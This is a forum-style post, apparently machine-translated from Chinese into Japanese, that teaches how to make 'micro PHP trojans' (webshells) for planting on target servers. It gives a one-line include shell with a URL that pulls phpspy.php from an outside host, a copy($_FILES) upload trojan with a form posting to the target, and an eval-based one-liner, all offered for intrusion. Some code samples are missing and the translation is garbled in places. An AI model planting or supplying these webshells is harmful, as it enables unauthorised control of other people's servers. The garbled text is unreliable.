[編集者注]: この記事は参考および研究のみを目的としています。
この記事には特別なことは何もありません。ただインスピレーションを提供したいだけです。そして、私を好きで、PHP の扉の周りをさまよっている友人たちにそれをあげてください。私は PHP を数日間学習したばかりで、成功したいと熱望しています。間違いや不足点があればお気軽に指摘してください。
PHP 構文の能力は ASP に匹敵しません。 phpinfo();?> だけがサーバー構成全体を監視できます。 cmd の実行やファイルのアップロードなどは非常に簡単です。現在使用されている最高の PHP トロイの木馬は angel's phpspy です。昨日、hak_ban が PHP トロイの木馬を暗号化する方法を尋ねました。私はまだ考えていませんが、マイクロ PHP トロイの木馬を作成する場合、それを殺すのはまだ難しいと思います。
ここでは、いくつかの機能がトロイの木馬としてどのように使用されるかについて簡単に説明します。
1. 外部コマンドを実行できるいくつかの関数: system、passthru、exec、shell_exec、popen。
例: をcmd.phpとして保存すれば、外部コマンドを実行する機能が実現できます。これらの機能は最も初期のマイクロ PHP トロイの木馬であると言えるため、一般的な仮想ホスト設定でもこれらの機能はブロックされます。
2. WDB フォーラムでの style.php の脆弱性をまだ覚えていますか?これを使用して、殺すのが難しい小さなトロイの木馬を作成できます。次のように:
<ccid_code><?php include($include);?></ccid_code> ログイン後にコピー |
1.php として保存すると、php をサポートしていない他のサーバーで他の .php トロイの木馬 (phpspy など) を呼び出すことができます。 .php ) 目的を達成するには: http://target.com/1.php? Include=http://www.xxx.com/phpspy.php
ここでは http://www.918x.com ではありません。サポートされている php、それ以外の場合、phpspy.php はターゲット サーバーではなくサーバー http://www.xxx.com で実行されます。
3. これは、Discuz 2.2F 攻撃でエンジェルによって提供された非常に優れたアップロード トロイの木馬です。変更はしていません:
<ccid_code><?copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);?></ccid_code> ログイン後にコピー |
として保存します。 .php をアップロードし、ローカルでフォームを送信します:
<ccid_code><form ENCTYPE="multipart/form-data" ACTION="http://目标服务器/up.php" METHOD="POST"><input NAME="MyFile" TYPE="file"><input VALUE=" 提交 " TYPE="submit"></form></ccid_code> ログイン後にコピー |
を使用して、大規模な php トロイの木馬をアップロードします。
4. Ice Fox Prodigal Son の ASP 一文トロイの木馬のような、ローカル フォームの送信を通じて実行される PHP トロイの木馬があるのではないかと考えています。最後に関数 eval を見つけました。その構文の説明は PHP4 中国語リファレンス マニュアルにあります:
構文:
<ccid_code>void eval(string code_str);</ccid_code> ログイン後にコピー |
内容の説明: この関数は次のように置き換えることができます。文字列内の変数値は通常、データベース データを処理するために使用されます。パラメータ code_str は、処理される文字列です。処理される文字列は PHP の文字列形式に準拠している必要があり、末尾にセミコロンが必要であることに注意してください。この関数を使用して処理される文字列は、PHP プログラムが終了するまで継続されます。
を PHP ファイルとしてターゲット ホストに保存できます (任意の PHP ファイルに挿入することもできると思います)。その後、ローカル送信によって目的は達成されますが、ASP とは異なり、magic_quotes_gpc = on の場合、多くの文字がフィルタリングされ、使用機能が大幅に低下します。
この PHP トロイの木馬のローカル フォームを何度も実行しましたが、まだ成熟したコードはありません。専門家にもアドバイスを求めてください。書き終わったら皆さんに捧げます。しかし、eval 関数が小型の PHP トロイの木馬として使用できることは疑いの余地がありません。
追伸: 書き終えた後、誰かが、実は専門家たちはすでに小型の PHP トロイの木馬を開発しているが、まだ公表されていないと教えてくれました。ねえ、私が勉強しているのは、他の人がすでに達成した結果だけです。とにかく、助けやアドバイスが得られることを願って、私の研究を皆さんと共有したいと思います。